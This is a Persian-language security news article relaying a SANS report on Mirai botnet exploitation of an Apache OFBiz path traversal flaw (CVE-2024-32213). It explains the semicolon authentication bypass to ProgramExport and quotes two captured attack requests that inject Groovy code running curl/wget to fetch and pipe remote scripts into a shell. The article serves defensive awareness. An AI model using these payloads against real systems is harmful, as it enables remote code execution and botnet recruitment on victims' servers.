خانه » شناسایی آسیب پذیری پیمایش دایرکتوری در فریمورک OFBiz

شناسایی آسیب پذیری پیمایش دایرکتوری در فریمورک OFBiz

توسط Vulnerbyte
28 بازدید
فریمورک OFBiz - آسیب پذیری پیمایش دایرکتوری

مرکز تحقیقاتی SANS اخیرا (سی و یکم جولای ۲۰۲۴) گزارشی منتشر کرده است که نشان می‌دهد چگونه فریمورک ERP منبع باز OFBiz، هدفِ نوع جدیدی از بات ‌نت Mirai قرار گرفته‌ است.

بنیاد آپاچی به عنوان بخشی از مجموعه پروژه‌های گسترده خود، از OFBiz، یک فریمورک مبتنی بر جاوا برای ایجاد اپلیکیشن‌های ERP  پشتیبانی می‌کند.

نرم‌افزارهای ERP (برنامه‌ریزی منابع سازمانی) در قلب بسیاری از شرکت‌های فعال در زمینه پشتیبانی از منابع انسانی، حسابداری، حمل و نقل و تولید قرار دارند. این سیستم‌ها می‌توانند بسیار پیچیده و نگهداری آنها دشوار باشد. آنها اغلب بسیار سفارشی هستند، از این رو گاهی پچ کردن آنها آسان نیست.

با این حال، آسیب ‌پذیری‌های بحرانی بر این سیستم‌ها تأثیر می‌گذارند و داده‌های مهم تجاری را در معرض خطر قرار می‌دهند.

به نظر می‌رسد OFBiz نسبت به دیگر نمونه‌های تجاری خود، بسیار کمتر رایج است اما سازمان‌ها برای داده‌های تجاری حساس مانند هر سیستم ERP دیگری، به OFBiz نیز متکی هستند و امنیت سیستم‌های ERP بسیار مهم می‌باشد.

یک به ‌روزرسانی امنیتی مهم در ماه می ۲۰۲۴، برای OFBiz منتشر شد. این به روزرسانی، یک آسیب پذیری پیمایش دایرکتوری[1] یا پیمایش مسیر[2] را که می‌تواند منجر به اجرای فرمان از راه دور شود، برطرف کرد.

پیمایش مسیر به عنوان پیمایش دایرکتوری نیز شناخته می‌شود. این آسیب ‌پذیری‌ها مهاجم را قادر می‌سازند تا فایل‌های دلخواه همچون کد و داده‌های برنامه، داده های لاگین سیستم‌های بک ِاند و فایل‌های حساس سیستم عامل را بر روی سروری که برنامه را اجرا می‌کند، بخواند.

نسخه‌های پیش از ۱۸.۱۲.۱۳ فریمورک OFBiz تحت تأثیر این آسیب پذیری قرار دارند. جزئیات این آسیب پذیری در اینجا منتشر شده است.

با سوء استفاده از آسیب پذیری پیمایش دایرکتوری یا پیمایش مسیر می‌توان قوانین کنترل دسترسی را دور زد. برای مثال، چنانچه یک کاربر بتواند به دایرکتوری “public/” دسترسی داشته باشد اما به دایرکتوری “admin/” نَه، آنگاه مهاجم ممکن است از URLی مانند ” /public/../admin” برای فریب دادن منطق کنترل دسترسی سوء استفاده کند.

پیمایش دایرکتوری در OFBiz، به راحتی با قرار دادن نقطه ویرگول (semicolon) فعال می‌شود. تنها چیزی که مهاجم باید پیدا کند یک URL است که می‌تواند به آن دسترسی داشته باشد و یک نقطه ویرگول به دنباله آن اضافه کند. نمونه این URL به صورت زیر خواهد بود:

				
					/webtools/control/forgotPassword;/ProgramExport
				
			

از آنجا که کاربران باید بتوانند رمزهای عبور را بدون ورود به سیستم بازنشانی کنند، “forgotPassword” نیازی به احراز هویت ندارد. از سوی دیگر، “ProgramExport” باید با دسترسی کنترل شود و قابل دسترس نباشد مگر اینکه کاربر وارد سیستم شده باشد.

منطق نقطه ویرگول بالا به هر کاربری اجازه می‌دهد تا بدون لاگین به سیستم، به بخش دوم URL، “/ProgramExport” دسترسی داشته باشد.

یک مهاجم باید از یک درخواست POST برای سوء استفاده از آسیب پذیری استفاده کند اما لزوماً به بدنه درخواست نیاز ندارد. در عوض، یک پارامتر URL به خوبی کار خواهد کرد.

SANS از شبکه گسترده‌ای از هانی پات‌ها برای شناسایی تلاش‌ها به منظور سوء استفاده از طیف گسترده‌ای از آسیب پذیری‌های برنامه‌های وب استفاده می‌کند. این حسگرها اخیرا افزایش قابل توجهی را در تلاش برای سوء استفاده از CVE-2024-32213، آسیب‌پذیری OFBiz که در بالا به آن اشاره شد، شناسایی کرده‌اند.

این تلاش‌ها از دو آدرس IP مختلف نشات می‌گیرند که با اقدامات مختلفی برای بهره‌برداری از دستگاه‌های اینترنت اشیاء که معمولاً با انواع فعلی بات ‌نت Mirai مرتبط میباشند، همراه هستند.

هکرها از دو اکسپلویت استفاده کرده‌اند. آنها در اولین مورد، از URL برای گنجاندن دستوری استفاده نمودند که اکسپلویت قرار بود آن را اجرا کند:

				
					POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
				
			

مورد دوم از بدنه درخواست برای دستور استفاده کردند که بیشتر برای درخواست‌های “POST” رایج است:

				
					POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);

				
			

متأسفانه، نَه اسکریپت “bin.sh” و نَه “sh” بازیابی نشدند. آدرس‌های IP در تاریخ 29 جولای با استفاده از user agent “KrebsOnSecurity,”  اسکن شدند.

با این حال، URLهای اسکن شده عمدتاً به دنبال shellهای وب موجود از حملات قبل بودند. آدرس IP همچنین برای توزیع فایلی به نام “botx.arm” استفاده شده بود. این نام فایل اغلب با انواع Mirai مرتبط می‌باشد.

با اینکه جمعیتی که در معرض این آسیب‌ پذیر قرار دارند، اندک هستند اما ممکن است به انواع بات نت Mirai اضافه شوند.

CISA خاطرنشان کرده است که در حال حاضر 55 آسیب ‌پذیری پیمایش دایرکتوری را به عنوان بخشی از کاتالوگ «آسیب ‌پذیری‌های مورد سوء استفاده شناخته شده» (KEV[3]) دنبال می‌کند.

 

[1] Directory Traversal

[2] path traversal

[3] Known Exploited Vulnerabilities

 

منابع

همچنین ممکن است دوست داشته باشید

پیام بگذارید